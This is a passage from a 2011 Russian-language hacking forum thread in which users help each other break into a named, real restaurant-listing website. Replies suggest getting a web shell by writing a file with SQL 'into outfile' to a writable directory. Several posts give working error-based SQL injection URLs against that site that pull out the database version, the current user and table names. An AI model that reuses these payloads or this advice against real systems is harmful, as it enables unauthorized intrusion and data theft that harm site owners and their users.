ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16391  
Старый 20.02.2011, 00:37
Vollkorn
Познающий
Регистрация: 06.11.2010
Сообщений: 86
С нами: 8165846

Репутация: -6
По умолчанию

Цитата:
Сообщение от None  
Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
Какие сейчас есть варианты получения шела?
Проверь файловые привилегии, и залей шелл через скуль.
 
Ответить с цитированием

  #16392  
Старый 20.02.2011, 01:00
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

Цитата:
Сообщение от /Montana  
Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).
Какие сейчас есть варианты получения шела?
select ' into outfile '(найди путь к папки где стоит права 777)'
 
Ответить с цитированием

  #16393  
Старый 20.02.2011, 01:53
/Montana
Познающий
Регистрация: 26.10.2007
Сообщений: 83
С нами: 9758776

Репутация: 45
По умолчанию

Цитата:
Сообщение от Vollkorn  
Проверь файловые привилегии, и залей шелл через скуль.
Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.

Дира где находиться сайт /home/.sites/site1/
 
Ответить с цитированием

  #16394  
Старый 20.02.2011, 02:02
boortyhuhtyu
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами: 8039126

Репутация: -6


По умолчанию

раскажите про xpatch injection?
 
Ответить с цитированием

  #16395  
Старый 20.02.2011, 13:05
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами: 9152742

Репутация: 62
По умолчанию

Цитата:
Сообщение от boortyhuhtyu  
раскажите про xpatch injection?
клац
 
Ответить с цитированием

  #16396  
Старый 20.02.2011, 16:34
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Помогите определить версию БД.

http://www.menupix.com/losangeles/restaurants.php?id=-204431+%6f%72%64%65%72+by+3+--+
 
Ответить с цитированием

  #16397  
Старый 20.02.2011, 16:50
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Код:
http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
 
Ответить с цитированием

  #16398  
Старый 20.02.2011, 17:02
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от Seravin  
Код:
http://www.menupix.com/losangeles/restaurants.php?id=1+and+%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
Как вывести имя юзера?
 
Ответить с цитированием

  #16399  
Старый 20.02.2011, 17:06
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от FlaktW  
Как вывести имя юзера?
Код:
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*%202))having+min(0)+or+1
 
Ответить с цитированием

  #16400  
Старый 20.02.2011, 18:29
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от Фараон  
Код:
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat(user(),floor(rand(0)*%202))having+min(0)+or+1
Каким запросом можно вывести название таблиц?

http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((SELECT+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1)),floor(rand (0)*%202))having+min(0)+or+1
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.